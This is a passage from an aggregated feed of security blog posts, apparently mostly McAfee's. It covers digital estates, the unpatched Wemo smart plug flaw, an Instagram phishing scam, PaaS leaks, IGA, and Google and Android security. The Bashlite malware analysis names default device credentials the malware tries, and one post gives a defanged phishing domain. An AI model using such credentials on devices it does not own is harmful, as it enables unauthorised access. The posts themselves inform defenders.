Just like Facebook, Instagram too offers the option of either getting an account deleted or memorialized, after they receive a valid request. They also pledge to take measures to protect the privacy of the deceased person by securing the account.

YouTube

YouTube does not yet offer any facility for preserving or deleting content created by users. In fact, it regularly deletes inactive or dead accounts, which is quite understandable, given the huge volumes of uploads per minute.

Twitter

It allows legal successors to place request for deactivation of the account. They will guide you through the process, which is similar to that of Facebook and Instagram.

LinkedIn

The legal successors/family members need to approach them with certain information and fill out a form shared on their site. They will then close the account and remove the profile.

Google

Sign into Google -> My Account -> Personal Info & Privacy -> Inactive Account Manager -> setup. Then add up to 10 trusted people who will be notified if you have been inactive for a specified period. You can leave them a last message and they can also download the data that you have chosen to share with them – like emails, passwords saved by Google, photos in Drive etc.

Or else, you can ask Google to delete your entire account after a certain amount of inactivity.

Microsoft including Outlook

Similarly, legal successors can inform Microsoft to close down the account and download any information you may have chosen to share with them.

In conclusion

So, you see if you leave everything written and registered in your will, your dear ones will have less to bother about. Also, it’s our duty as well, for this is the digital world and we are the digital natives. It is about time we start doing things right in cyberspace too so as to not leave behind a legacy of clutter, confusion and possible cybercrime.

Always keep your devices secured with advanced security tools like McAfee Total Protection so that cyber criminals don’t get to your data before your heirs do.

The post Here’s a Codicil to Add to Your Will – Disposal of Your Digital Assets appeared first on McAfee Blogs.

How Business can address the Security Concerns of Online Shoppers

It’s no secret that cybersecurity is an epidemic problem that affects online businesses on a global scale. E-commerce businesses are especially affected by data breaches because it weakens the consumer’s trust in online businesses to protect their personal data. In response to the growing number of breaches, governments and enterprises alike are stepping up to the plate to provide sustainable solutions to the problem.

The UK is aiming to become a world leader in cybersecurity by investing a substantial amount of money (to the tune of £70 million) in the Industrial Strategy Challenge Fund. The fund represents the government’s commitment to increase funding in research and development by £4.7 billion over a four year period. One of the primary goals of the investment will be to supply the industry with the money necessary to design and develop state-of-the-art hardware that’s more secure and resilient to common cyber threats.

The logic stems from the fact that cybercriminals are constantly finding new ways to exploit current technology, so the best way to combat future attacks is to design chips and hardware with stronger security features built into them to outpace cyber threats. However, this means businesses will have to invest in new IT systems as it rolls out to keep their security measures up to par.

For the time being, online business owners need to do everything in their power to address the privacy concerns of their users. In some cases, this might mean investing in more secure and modern e-commerce platforms that offer security features, such as TLS (still commonly known as SSL) protection and security software to protect against malware attacks, or simply generating new, strong admin passwords on a regular basis.

The fact is, there is no way to provide customers with a 100% guarantee their personal data is safe, but there are actions webmasters and companies can do to make their websites a lot safer to use by their customers. To help you learn more about how you can secure your site from cyber threats, Wikibuy has laid out 15 steps in the infographic below.


How Business Owners Can Address Online Shopping Concerns

McAfee ATR Team Discovers New IoT Vulnerability in Wemo Insight Smart Plugs

*This blog is originally from August 2018 and was updated April 2019*

From connected baby monitors to smart speakers — IoT devices are becoming commonplace in modern homes. Their convenience and ease of use make them seem like the perfect gadgets for the whole family. However, users can be prone to putting basic security hygiene on the backburner when they get a shiny new IoT toy, such as applying security updates, using complex passwords for home networks and devices, and isolating critical devices or networks from IoT. Additionally, IoT devices’ poor security standards make them conveniently flawed for someone else: cybercriminals, as hackers are constantly tracking flaws which they can weaponize. When a new IoT device is put on the market, these criminals have a new opportunity to expose the device’s weaknesses and access user networks. As a matter of fact, our McAfee Labs Advanced Threat Research team uncovered a flaw in one of these IoT devices: the Wemo Insight Smart Plug, which is a Wi-Fi–connected electric outlet.

Once our research team figured out how exactly the device was vulnerable, they leveraged the flaw to test out a few types of cyberattacks. The team soon discovered an attacker could leverage this vulnerability to turn off or overload the switch, which could overheat circuits or turn a home’s power off. What’s more – this smart plug, like many vulnerable IoT devices, creates a gateway for potential hackers to compromise an entire home Wi-Fi network. In fact, using the Wemo as a sort of “middleman,” our team leveraged this open hole in the network to power a smart TV on and off, which was just one of the many things that could’ve been possibly done.

And as of April 2019, the potential of a threat born from this vulnerability seems as possible as ever. Our ATR team even has reason to believe that cybercriminals already have or are currently working on incorporating the unpatched Wemo Insight vulnerability into IoT malware. IoT malware is enticing for cybercriminals, as these devices are often lacking in their security features. With companies competing to get their versions of the latest IoT device on the market, important cybersecurity features tend to fall by the wayside. This leaves cybercriminals with plenty of opportunities to expose device flaws right off the bat, creating more sophisticated cyberattacks that evolve with the latest IoT trends.

Now, our researchers have reported this vulnerability to Belkin, and, almost a year after initial disclosure, are awaiting a follow-up. However, regardless if you’re a Wemo user or not, it’s still important you take proactive security steps to safeguard all your IoT devices. Start by following these tips:

  • Keep security top of mind when buying an IoT device. When you’re thinking of making your next IoT purchase, make sure to do your research first. Start by looking up the device in question’s security standards. A simple Google search on the product, as well as the manufacturer, will often do the trick.
  • Change default passwords and do an update right away. If you purchase a connected device, be sure to first and foremost change the default password. Default manufacturer passwords are rather easy for criminals to crack. Also, your device’s software will need to be updated at some point. In a lot of cases, devices will have updates waiting from them as soon as they’re taken out of the box. The first time you power up your device, you should check to see if there are any updates or patches from the manufacturer.
  • Keep your firmware up-to-date. Manufacturers often release software updates to protect against these potential vulnerabilities. Set your device to auto-update, if you can, so you always have the latest software. Otherwise, just remember to consistently update your firmware whenever an update is available.
  • Secure your home’s internet at the source. These smart home devices must connect to a home Wi-Fi network in order to run. If they’re vulnerable, they could expose your network as a result. Since it can be challenging to lock down all the IoT devices in a home, utilize a solution like McAfee Secure Home Platform to provide protection at the router-level.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post McAfee ATR Team Discovers New IoT Vulnerability in Wemo Insight Smart Plugs appeared first on McAfee Blogs.

The “Nasty List” Phishing Scam Is out to Steal Your Instagram Login

How often do you check your social media accounts? According to a recent study, internet users spend an average of 2 hours and 22 minutes per day on social networking platforms. Since users are pretty reliant on social media, cybercriminals use it as an avenue to target victims with various cyberattacks. The latest social media scheme called “The Nasty List” scams users into giving up their Instagram credentials and uses their accounts to further promote the phishing scam.

So, how exactly do hackers trick innocent users into handing over their login information? Cybercriminals spread this scam by sending messages through hacked accounts to the user’s followers, stating that they were spotted on a “Nasty List.” These messages will read something like “OMG your actually on here, @TheNastyList_34, your number is 15! its really messed up.” If the recipient visits the profile listed in the message, they will see a link in the profile description. An example of one URL that has been listed in these scam profiles is nastylist-instatop50[.]me. The user is tricked into believing that this link will supposedly allow them to see why they are on this list. This link brings up what appears to be a legitimate Instagram login page. When the victim enters their credentials on the fake login page, the cybercriminals behind this scheme will be able to take over the account and use it to further promote the scam.

Images courtesy of Bleeping Computer.
Images courtesy of Bleeping Computer.

Fortunately, there are a number of steps Instagram users can take to ensure that they don’t fall victim to this trap. Check out the following tips:

  • Be skeptical of messages from unknown users. If you receive a message from someone you don’t know, it’s best to ignore the message altogether or block the user. Additionally, if you think a friend’s social media account has been compromised, look out for spelling mistakes and grammatical errors in their message, which are common in these scams.
  • Exercise caution when inspecting links sent to your messages. Always inspect a URL before you click on it. In the case of this scam, the URL that appears with the fake login page is clearly incorrect, as it ends in a [.]me.
  • Reset your password. If your account was hacked by ‘The Nasty List’ but you still have access to your account, reset your password to regain control of your account.

And, as usual, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home  on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post The “Nasty List” Phishing Scam Is out to Steal Your Instagram Login appeared first on McAfee Blogs.

Our PaaS App Sprung a Leak

Many breaches start with an “own goal,” an easily preventable misconfiguration or oversight that scores a goal for the opponents rather than for your team. In platform-as-a-service (PaaS) applications, the risk profile of the application can lure organizations into a false sense of security. While overall risk to the organization can be lowered, and new capabilities otherwise unavailable can be unlocked, developing a PaaS application requires careful consideration to avoid leaking your data and making the task of your opponent easier.

PaaS integrated applications are nearly always multistep service architectures, leaving behind the simplicity of yesterday’s three-tier presentation/business/data logic applications and basic model-view-controller architectures. While many of these functional patterns are carried forward into modern applications—like separating presentation functions from the modeled representation of a data object—the PaaS application is nearly always a combination of linear and non-linear chains of data, transformation, and handoffs.

As a simple example, consider a user request to generate a snapshot of some kind of data, like a website. They make the request through a simple portal. The request would start a serverless application, which applies basic logic, completes information validation, and builds the request. The work goes into a queue—another PaaS component. A serverless application figures out the full list of work that needs to be completed and puts those actions in a list. Each of these gets picked up and completed to build the data package, which is finally captured by another serverless application to an output file, with another handoff to the publishing location(s), like a storage bucket.

Planning data interactions and the exposure at each step in the passing process is critical to the application’s integrity. The complexity of PaaS is that the team must consider threats both for each script/step at a basic level individually as well as holistically for the data stores in the application. What if I could find an exploit in one of the steps to arbitrarily start dumping data? What if I found a way to simply output more data unexpectedly than it was designed to do? What if I found a way to inject data instead, corrupting and harming rather than stealing?

The familiar threats of web applications are present, and yet our defensive posture is shaped by which elements of the applications we can see and which we cannot. Traditional edge and infrastructure indicators are replaced by a focus on how we constructed the application and how to use cloud service provider (CSP) logging together with our instrumentation to gain a more holistic picture.

In development of the overall application, the process architecture is as important as the integrity of individual technical components. The team leadership of the application development should consider insider, CSP, and external threats, and consider questions like:

  • Who can modify the configuration?
  • How is it audited? Logged? Who monitors?
  • How do you discover rogue elements?
  • How are we separating development and production?
  • Do we have a strategy to manage exposure for updates through blue/green deployment?
  • Have we considered the larger CSP environment configuration to eliminate public management endpoints?
  • Should I use third-party tools to protect access to the cloud development and production environment’s management plane, such as a cloud access broker, together with cloud environmental tools to enumerate accounts and scan for common errors?

In the PaaS application construction, the integrity of basic code quality is magnified. The APIs and/or the initiation processes of serverless steps are the gateway to the data and other functions in the code. Development operations (DevOps) security should use available sources and tools to help protect the environment as new code is developed and deployed. These are a few ways to get your DevOps team started:

  • Use the OWASP REST Security Cheat Sheet for APIs and code making calls to other services directly.
  • Consider deploying tools from your CSP, such as the AWS Well-Architected Tool on a regular basis.
  • Use wrappers and tie-ins to the CSP’s PaaS application, such as AWS Lambda Layers to identify critical operational steps and use them to implement key security checks.
  • Use integrated automated fuzzing/static test tools to discover common missteps in code configuration early and address them as part of code updates.
  • Consider accountability expectations for your development team. How are team members encouraged to remain owners of code quality? What checks are necessary to reduce your risk before considering a user story or a specific implementation complete?

The data retained, managed, and created by PaaS applications has a critical value—without it, few PaaS applications would exist. Development teams need to work with larger security functions to consider the privacy requirements and security implications and to make decisions on things like data classification and potential threats. These threats can be managed, but the specific countermeasures often require a coordinated implementation between the code to access data stores, the data store configuration itself, and the dedicated development of separate data integrity functions, as well as a disaster recovery strategy.

Based on the identified risks, your team may want to consider:

  • Using data management steps to reduce the threat of data leakage (such as limiting the amount of data or records which can be returned in a given application request).
  • Looking at counters, code instrumentation, and account-based controls to detect and limit abuse.
  • Associating requests to specific accounts/application users in your logging mechanisms to create a trail for troubleshooting and investigation.
  • Recording data access logging to a hardened data store, and if the sensitivity/risk of the data store requires, transition logs to an isolated account or repository.
  • Asking your development team what the business impact of corrupting the value of your analysis, or the integrity of the data set itself might be, for example, by an otherwise authorized user injecting trash?

PaaS applications offer compelling value, economies of scale, new capabilities, and access to advanced processing otherwise out of reach for many organizations in traditional infrastructure. These services require careful planning, coordination of security operations and development teams, and a commitment to architecture in both technical development and managing risk through organizational process. Failing to consider and invest in these areas while rushing headlong into new PaaS tools might lead your team to discover that your app has sprung a leak!

The post Our PaaS App Sprung a Leak appeared first on McAfee Blogs.

From Internet to Internet of Things

Thirty years ago, Tim Berners-Lee set out to accomplish an ambitious idea – the World Wide Web. While most of us take this invention for granted, we have the internet to thank for the technological advances that make up today’s smart home. From smart plugs to voice assistants – these connected devices have changed the modern consumer digital lifestyle dramatically. In 2019, the Internet of Things dominates the technological realm we have grown accustomed to – which makes us wonder, where do we go from here? Below, we take a closer look at where IoT began and where it is headed.

A Connected Evolution

Our connected world started to blossom with our first form of digital communication in the late 1800s –– Morse code. From there, technological advancements like the telephone, radio, and satellites made the world a smaller place. By the time the 1970s came about, email became possible through the creation of the internet. Soon enough the internet spread like wildfire, and in the 1990s we got the invention of the World Wide Web, which revolutionized the way people lived around the world. Little did Berners-Lee know that his invention would be used decades, probably even centuries, later to enable the devices that contribute to our connected lives.

Just ten years ago, there were less than one billion IoT devices in use around the world. In the year 2019, that number has been projected to skyrocket to over eight billion throughout the course of this year. In fact, it is predicted that by 2025, there will be almost twenty-two billion IoT devices in use throughout the world. Locks, doorbells, thermostats and other everyday items are becoming “smart,” while security for these devices is lacking quite significantly. With these devices creating more access points throughout our smart homes, it is comparable to leaving a backdoor unlocked for intruders. Without proper security in place, these devices, and by extension our smart homes, are vulnerable to cyberattacks.

Moving Forward with Security Top of Mind

If we’ve learned one thing from this technological evolution, it’s that we aren’t moving backward anytime soon. Society will continue to push the boundaries of what is possible – like taking the first a picture of a black hole. However, in conjunction with these advancements, to steer in the right direction, we have to prioritize security, as well as ease of use. For these reasons, it’s vital to have a security partner that you can trust, that will continue to grow to not only fit evolving needs, but evolving technologies, too. At McAfee, we make IoT device security a priority. We believe that when security is built in from the start, user data is more secure. Therefore, we call on manufacturers, users, and organizations to all equally do their part to safeguard connected devices and protect precious data. From there, we can all enjoy these technological advancements in a secure and stress-free way.

Interested in learning more about IoT and mobile security trends and information? Follow @McAfee_Home on Twitter, and ‘Like” us on Facebook.

The post From Internet to Internet of Things appeared first on McAfee Blogs.

The Mute Button: How to Use Your Most Underrated Social Superpower

For a Monday, the school day was turning out to be surprisingly awesome. Mackenzie sat with friends at lunch, chatted with her favorite teacher, and aced her English test.

Then came the shift.

It happened between 5th and 6th period when Mackenzie checked her Instagram account. One glance showed several posts from the popular girls (yet another party I wasn’t invited to, she thought). She saw her friend Emma’s Spring Break photos (how can someone look that good in a bikini, she wondered) followed by several whos-dating-who posts from blissful looking couples (when is someone going to love me, she mused). In less than 60 seconds, the images and comments Mackenzie saw had the power to subtly alter her heart and mind.

FOMO

Mackenzie isn’t alone. Studies have repeatedly linked Social networks with high levels of anxiety, depression, bullying and an emotional phenomenon called FOMO (fear of missing out) among teens and — if we’re honest — among plenty of adults.

We can’t control the perpetual stream of photos, comments, and videos that flood our social feeds. Social is here to stay, and to some extent, most of us are required to be online. However, we can control the amount and the quality of the content that comes at us. And, we can teach our kids to do the same.

It’s called the mute button, and it could be your family’s most underrated superpower when it comes to enjoying life online. Many people either don’t know about their mute button or forget they have it.

The mute button allows you to turn off someone’s feed (yes—make it vanish) without the awkwardness of unfollowing or unfriending them. The cool part: No one knows you’ve muted them, so there are no hurt feelings. You can still view a muted person’s profile, and they can see yours. You can send or receive direct messages as if everything were copacetic.

How to mute

Thankfully, you can mute people easily on most social networks.

To mute someone on Instagram, go to the person’s page, find to the three little dots in the top upper right of the page, click and choose mute (you can choose to mute their feed and their stories). You can mute someone on Facebook by going to the person’s main page and clicking the “friends” button under their photo. You will have the option to “unfollow,” which will mute the person’s content but allow you to stay friends. On Twitter, you can stop seeing a person’s tweets by going to the three dots in the top upper right corner and choosing “mute.”

This simple, powerful click will allow you to curate what you see in your feed every day and instantly block the content that is annoying or negative. The result? Fewer emotional darts are flying at you randomly throughout the day and, hopefully, a more enjoyable, positive experience online.

When to mute

What’ s considered annoying or offensive to one person may be entirely acceptable and even enjoyable to someone else. So, the reasons for muting someone can vary greatly.

A few reasons to mute might be: 

  • Inappropriate or offensive content
  • Mean, bullying, or reckless content
  • Posting too frequently
  • Excessive bragging, boasting, or self-promotion
  • Content that negatively impacts your mental health
  • Non-stop political posts or rants
  • Too many selfies
  • Graphic or disturbing images or videos
  • Constant negative or critical posts
  • Useless, uninteresting, or tedious information
  • Monopolizing conversations
  • Perpetual personal drama
  • Too much content on one topic

Talking points for families

Editing your social circle is okay. The voices that surround you have influence, so choose the voices you surround yourself with carefully. Also, being “friends” with 1,000 or even 300 people isn’t realistic or reflective of real life. Remind kids: That tug (or compulsion) you feel to like, comment, post, or chime in online should not rule your time or your mind. You (and your family) may be surprised how good it feels to whittle down the number of voices you allow into your day.

Pay attention to emotional triggers. In many ways, you are what you consume online. Ask yourself: Is this person’s account positive or negative? Does it make me feel included and worthy or excluded and less-than? Do I feel jealous, annoyed, or negative when I see this person’s updates, photos, or tweets? Edit boldly. You can mute negative accounts temporarily or permanently without guilt.

Less noise, less clutter. If you want things to be different, you have to do things differently, and this applies online. Forming your thoughts and opinions is much more difficult when you are constantly absorbing other people’s ideas. The less digital clutter, the more room for quiet contemplation and self-awareness, which is always a good idea for young and older mind minds alike.

Be brave, be you. Kids pay far more attention to friend and follower counts than adults do. They consider it intentional rejection when someone unfollows or unfriends them online. For that reason, you may need to reiterate the importance of putting mental health before popularity or people pleasing. Remind them: It’s okay to mute, unfollow, or unfriend any person who is not a positive influence on your heart and mind.

No one is everyone’s favorite. It’s impossible to like everyone or be liked by everyone — impossible. There will always be individuals who will get under your skin. And, at times, people may feel the same about you. This is a normal part of human relationships. This reality makes striving to be liked by everyone online an impossible, exhausting task.

The digital world is packed with ever-changing social complexities. Seemingly casual clicks can trigger an avalanche of positive or negative emotions that can take their toll (whether we realize it or not). Helping your child think proactively about content and take responsibility for the content comes across his or her screen, is more important than ever in raising wise, healthy digital kids.

The post The Mute Button: How to Use Your Most Underrated Social Superpower appeared first on McAfee Blogs.

Do you have 1 minute? Check out our New weekly Quick Privacy Ref-erence series.

At Privacy Ref we are always thinking of ways to improve the experience of our followers and clients alike. Weekly on our YouTube channel you will find a relevant privacy topic being discussed in a 1-minute video such as:  Cookies walls and the Dutch DPA – Ben Siegel discusses his research on the Dutch Personal […]

The post Do you have 1 minute? Check out our New weekly Quick Privacy Ref-erence series. appeared first on Privacy Ref Blog.

Five Reasons You Need Identity Governance & Administration

English

Demands on organizations continue to intensify – the precarious balance of requests for more access with the need to be more secure is difficult to maintain. Additionally, all of this is to be achieved faster, with fewer resources. It is more important than ever for each organization to develop a strategy for managing and governing user access in an automated manner. A well-defined Identity Governance Administration (IGA) program is becoming an increasingly critical piece of an organization’s security portfolio.

Small organizations with employees numbering in the double digits will be able to easily manage granting, removing, and reviewing access, and may even have predefined roles or access templates. Larger businesses, on the other hand, greatly benefit from implementing an IGA solution in order to effectively manage access to systems, applications, and devices. Read on to find out the many benefits of IGA and determine if it’s time for your organization to explore the world of IGA.

1. Regulatory Compliance

With regulations like the GDPR (General Data Protection Regulation), SOX (Sarbanes-Oxley), and HIPAA (Health Insurance Portability and Accountability Act) prioritizing and mandating data privacy, industries are focusing on access issues more than ever. Limiting and monitoring access to only those that need it is not only a crucial security measure, but one that is becoming critical to staying in compliance with these regulations.

IGA solutions not only help ensure that access to sensitive information like patient records or financial data is strictly controlled, they also enable organizations to prove they are taking these actions. Organizations can receive audit requests at any time. An effective IGA solution makes the required periodic review and attestation of access business friendly, effective, and comes with built-in reporting capabilities to meet relevant government and industry regulations. Taking a visual approach to the data can make this whole process more accurate and easier to deploy to the business.

2. Risk Management

The news cycle is dominated by stories of massive data breaches, with the organizations involved having to spend time and money on remediation efforts, while also dealing with the damage done to their reputation. IGA solutions take a proactive approach, reducing the exposure of sensitive data by rigorously limiting and guarding access to begin with, reducing the risk in the environment.

IGA solutions enable a robust approach to managing and governing access by focusing on three aspects of access. First, they practice the principle of least privilege, eliminating excess privileges and granting access to only those who absolutely need it in order to do their jobs. Secondly, they terminate ‘orphaned’ accounts as quickly as possible. These accounts that are no longer being used, either because an employee is no longer with the company, or any other reason, are perfect targets for those looking to breach the environment. Finally, IGA solutions monitor for segregation of duty (SoD) violations. This critical risk management concept dictates that no single individual should be able to complete a task, creating a built-in system of checks and balances. For example, in a financial transaction, whoever creates a payee should not be the one to authorize payment.

3. Business Changes

Organizations grow and change continually, and an IGA solution can make those changes more efficient and less risky. Small changes, like individual promotions, transfers, and layoffs, can quickly be implemented, since IGA solutions can provision access based on roles, and not on individual accounts. This strategy of Role Based Access Control (RBAC) works equally well for larger changes, like mergers, acquisitions, and corporate reorganizations. IGA solutions can greatly shorten the timeline for executing bulk additions or transitions of user accounts by automating and streamlining provisioning and approvals.  It is critical to develop roles in an accurate and intuitive manner.

4. Streamlining Budget

We all need to do more with less. Managing identity and access manually can be an unsustainable burden on IT. Provisioning access manually takes far more time, and often comes with additional help desk calls or tickets if these changes take too long or are done incorrectly. Documentation and reporting requirements add more effort and complexity. Certifying privileged access also becomes time consuming for managers and can result in rubber-stamping approvals in order to get on with more pressing matters. Carelessness in any of these tasks can lead to costly mistakes.

Of course, this also means that IT teams are sacrificing time that could be spent on other projects or improvements. IGA solutions minimize these time management issues and can also accomplish these tasks with higher accuracy.

5. Service Delivery

At its core, IGA solutions are designed to make life easier. Their usefulness impacts everyone within an organization. Establishing roles and streamlining provisioning makes for a much more efficient on-boarding process. The inefficiencies of a new-hire having to wait for access, sometimes for days or weeks, can be eliminated. Their accounts will be created with access already in place, based on their assigned role. Managers don’t have to waste time requesting access for employees, nor do they need to worry about making sure that former employees no longer have access. Ultimately, everyone will have the access they need when they need it, allowing everyone to get to work that much faster.

With these clear, measurable benefits, it’s easy to see why IGA solutions are quickly becoming an essential component in many organizations’ security strategy. Core Security, a HelpSystems Company, has developed multiple integrated IGA solutions to tailor fit your organization, since no two IT environments look alike. While these solutions have different approaches to IGA, they all provide these five critical benefits, and more. To find out which IGA solution is right for you, request a personalized demo from one of our experts today.

Why you need IGA2.png

Identity and Access Management
Big text: 
Blog
Resource type: 
Blogs
Reduce Identity Related Risk

Access a collection of identity governance resources and tools for protecting your organization.

DevSecOps Podcast Episodes Recap

The week of April 15th I dedicated every Security In Five podcast episode to DevSecOps and the push to move security left. I was motivated to talk about this push because it’s a concept and challenge I deal with almost daily with my own projects and working with clients. DevSecOps, or DevOps if you are […]

The post DevSecOps Podcast Episodes Recap appeared first on Security In Five.

IoT Zero-Days – Is Belkin WeMo Smart Plug the Next Malware Target?

Effective malware is typically developed with intention, targeting specific victims using either known or unknown vulnerabilities to achieve its primary functions. In this blog, we will explore a vulnerability submitted by McAfee Advanced Threat Research (ATR) and investigate a piece of malware that recently incorporated similar vulnerabilities. The takeaway from this blog is the increasing movement towards IoT-specific malware and the likelihood of this unique vulnerability being incorporated into future malware.

We are rapidly approaching the one-year mark for the date McAfee ATR disclosed to Belkin (a consumer electronics company) a critical, remote code execution vulnerability in the Belkin WeMo Insight smart plug.  The date was May 21st, 2018, and the disclosure included extensive details on the vulnerability (a buffer overflow), proof-of-concept, exploit code and even a video demo showing the impact, dropping into a root shell opened on the target device. We further blogged about how this device, once compromised, can be used to pivot to other devices inside the network, including smart TVs, surveillance cameras, and even fully patched non-IoT devices such as PCs. Initially, the vendor assured us they had a patch ready to go and would be rolling it out prior to our planned public disclosure. In January of 2019, Belkin patched a vulnerability in the Mr. Coffee Coffee Maker w/ WeMo, which McAfee ATR reported to Belkin on November 16th, 2018, and released publicly at Mobile World Congress in late February. We commend Belkin for an effective patch within the disclosure window, though we were somewhat surprised that this was the prioritized patch given the Mr. Coffee product with WeMo no longer appears to be produced or sold.

The Insight smart plug firmware update never materialized and, after attempts to try to communicate further, three months later, in accordance with our vulnerability disclosure policy, McAfee ATR disclosed the issue publicly on August 21st. Our hope is that vulnerability disclosures will encourage vendors to patch vulnerabilities, educate the security community on a vulnerable product to drive development of defenses and, ultimately, encourage developers to recognize the impact that insecure code development can have.

Fast forward nearly a year and, to the best of our knowledge this vulnerability, classified as CVE-2018-6692, is still a zero-day vulnerability.  As of April 10th, 2019, we have heard of plans for a patch towards the end of the month and are standing by to confirm. We intentionally did not release exploit code to the public, as we believe it tips the balance in favor of cyber criminals, but exploitation of this vulnerability, while challenging in some regards, is certainly straightforward for a determined attacker.

IoT-Specific Malware

Let’s focus now on why this vulnerability is enticing for malicious actors.  Recently, Trend Micro released a blog observing occasional in-the-wild detections for a malware known as Bashlite. This specific malware was recently updated to include IoT devices in its arsenal, specifically using a Metasploit module for a known vulnerability in the WeMo UPnP protocol. The vulnerability appears to be tied to a 2015 bug which was patched by Belkin and was used to fingerprint and exploit WeMo devices using the “SetSmartDevInfo” action and corresponding “SmartDevURL” argument.

We can say for certain that this Metasploit module is not targeting the same vulnerability submitted by McAfee ATR, which resides in the <EnergyPerUnitCostVersion> XML field, within the libUPnPHndlr.so library.

Analysis of Bashlite and IOT Device Targets

After briefly analyzing a few samples of the malware (file hashes from the aforementioned blog), the device appears to check for default credentials and known vulnerabilities in multiple IoT devices. For example, I came across a tweet after finding reference to a password in the binary of “oelinux123”.

This IoT device is an Alcatel Mobile Wifi, which has a number of known/default passwords. Notice the top username/password combination of “root:oelinux123.” When we analyze the actual malware, we can observe the steps used to enumerate and scan for vulnerable devices.

Here is a reference from the popular binary disassembly tool IDA Pro showing the password “OELINUX123” used to access a mobile WiFi device.

The next image is a large “jump table” used to scan through and identify a range of devices or targets using known passwords or vulnerabilities.

Next is some output from the “Echobot” scanner employed by the malware used to report possible vulnerabilities in target devices from the above jump table.

The final screenshot shows a list of some of the hardcoded credentials used by the malware.

The “huigu309” password appears to be associated with Zhone and Alcatel Lucent routers. Both routers have had several known vulnerabilities, backdoors and hardcoded passwords built into the firmware.

There is no need to continue the analysis further as the point of this is not to analyze the Bashlite malware in depth, but I did think it was worth expanding on some of the capabilities briefly, to show this malware is programmed to target multiple IoT devices.

Now to the point! The simple fact that generic WeMo Metasploit modules were added to this indicates that Belkin WeMo makes an interesting enough target that an unpatched vulnerability would be compelling to add to the malware’s capabilities. Hence, we believe it is possible, perhaps even likely, that malware authors already have or are currently working on incorporating the unpatched WeMo Insight vulnerability into IoT malware. We will be closely following threats related to this zero-day and will update or add to this blog if malware embedding this vulnerability surfaces. If the vendor does produce an effective patch, it will be a step in the right direction to reduce the overall threat and likelihood of weaponizing the vulnerability in malware.

How to Protect Your Devices

As this vulnerability requires network access to exploit the device, we highly recommend users of IoT devices such as the WeMo Insight implement strong WIFI passwords, and further isolate IoT devices from critical devices using VLANs or network segmentation. McAfee Secure Home Platform users can enable whitelisting or blacklisting features for protection from malicious botnets attempting to exploit this vulnerability.

Call to Action for Vendors, Consumers and Enterprise

It should be plain to see there is some low-hanging fruit in the industry of securing IoT devices. While some of the obvious simple issues such as hardcoded credentials are unexplainable, we understand that true software vulnerabilities cannot always be avoided. However, we issue a call-to action for IoT vendors; these issues must be fixed, and quickly too. Threat actors are constantly tracking flaws which they can weaponize, and we see a prime example of this in the Bashlite malware, updated for IoT devices including Belkin WeMo. By listening to consumer’s asks for security, partnering with researchers closely to identify flaws, and having a fast and flexible response model, vendors have a unique opportunity to close the holes in the products the world is increasingly relying on. Consumers can take away the importance of basic security hygiene; applying security updates when available, practicing complex password policy for home networks and devices, and isolating critical devices or networks from IoT.  Enterprise readers should be aware that just because this is an IoT consumer device typically, does not mean corporate assets cannot be compromised.  Once a home network has been infiltrated, all devices on that same network should be considered at risk, including corporate laptops.  This is a common method for cyber criminals to cross the boundary between home and enterprise.

The post IoT Zero-Days – Is Belkin WeMo Smart Plug the Next Malware Target? appeared first on McAfee Blogs.

Better protection against Man in the Middle phishing attacks



We’re constantly working to improve our phishing protections to keep your information secure. Last year, we announced that we would require JavaScript to be enabled in your browser when you sign in so that we can run a risk assessment whenever credentials are entered on a sign-in page and block the sign-in if we suspect an attack. This is yet another layer of protection on top of existing safeguards like Safe Browsing warnings, Gmail spam filters, and account sign-in challenges.

However, one form of phishing, known as “man in the middle” (MITM), is hard to detect when an embedded browser framework (e.g., Chromium Embedded Framework - CEF) or another automation platform is being used for authentication. MITM intercepts the communications between a user and Google in real-time to gather the user’s credentials (including the second factor in some cases) and sign in. Because we can’t differentiate between a legitimate sign in and a MITM attack on these platforms, we will be blocking sign-ins from embedded browser frameworks starting in June. This is similar to the restriction on webview sign-ins announced in April 2016.

What developers need to know

The solution for developers currently using CEF for authentication is the same: browser-based OAuth authentication. Aside from being secure, it also enables users to see the full URL of the page where they are entering their credentials, reinforcing good anti-phishing practices. If you are a developer with an app that requires access to Google Account data, switch to using browser-based OAuth authentication today.

The Android Platform Security Model



Each Android release comes with great new security and privacy features. When it comes to implementing these new features we always look at ways to measure the impact with data that demonstrates the effectiveness of these improvements. But how do these features map to an overall strategy?
Last week, we released a whitepaper describing The Android Platform Security Model. Specifically we discuss:
  • The security model which has implicitly informed the Android platform’s security design from the beginning, but has not been formally published or described outside of Google.
  • The context in which this security model must operate, including the scale of the Android ecosystem and its many form factors and use cases.
  • The complex threat model Android must address.
  • How Android’s reference implementation in the Android Open Source Project (AOSP) enacts the security model.
  • How Android’s security systems have evolved over time to address the threat model.
Android is fundamentally based on a multi-party consent1 model: an action should only happen if the involved parties consent to it. Most importantly, apps are not considered to be fully authorized agents for the user. There are some intentional deviations from the security model and we discuss why these exist and the value that they provide to users. Finally, openness is a fundamental value in Android: from how we develop and publish in open source, to the open access users and developers have in finding or publishing apps, and the open communication mechanisms we provide for inter-app interactions which facilitate innovation within the app ecosystem.
We hope this paper provides useful information and background to all the academic and security researchers dedicated to further strengthening the security of the Android ecosystem. Happy reading!
Acknowledgements: This post leveraged contributions from René Mayrhofer, Chad Brubaker, and Nick Kralevich

Notes


  1. The term ‘consent’ here and in the paper is used to refer to various technical methods of declaring or enforcing a party’s intent, rather than the legal requirement or standard found in many privacy legal regimes around the world. 

Why McAfee is Supporting the University of Guelph’s New Cyber Security and Threat Intelligence Degree Program

McAfee has a rich history in helping to shape the industry’s response to the ever-changing threat landscape.  We started as a pioneer in cybersecurity over three decades ago. Today, we are the device to cloud cybersecurity market leader, supporting consumers from small and large enterprises to governments.

But we don’t do this on our own. And in order for us to be successful in our mission to make the digital world more secure, we need to have the right people in place.

One of the largest challenges facing the cybersecurity industry today is the lack of skilled personnel and the global talent shortage. Current research indicates that our industry will face more than 1.5 million unfilled cybersecurity positions by 2025.

This talent shortage, coupled with the increasing volume of threats and the changing cybercriminal landscape, presents a problem which is only getting worse. And not just for us, but the whole industry. Therefore, we must, as a group, collectively improve upon this talent shortage.

So how will we do this?

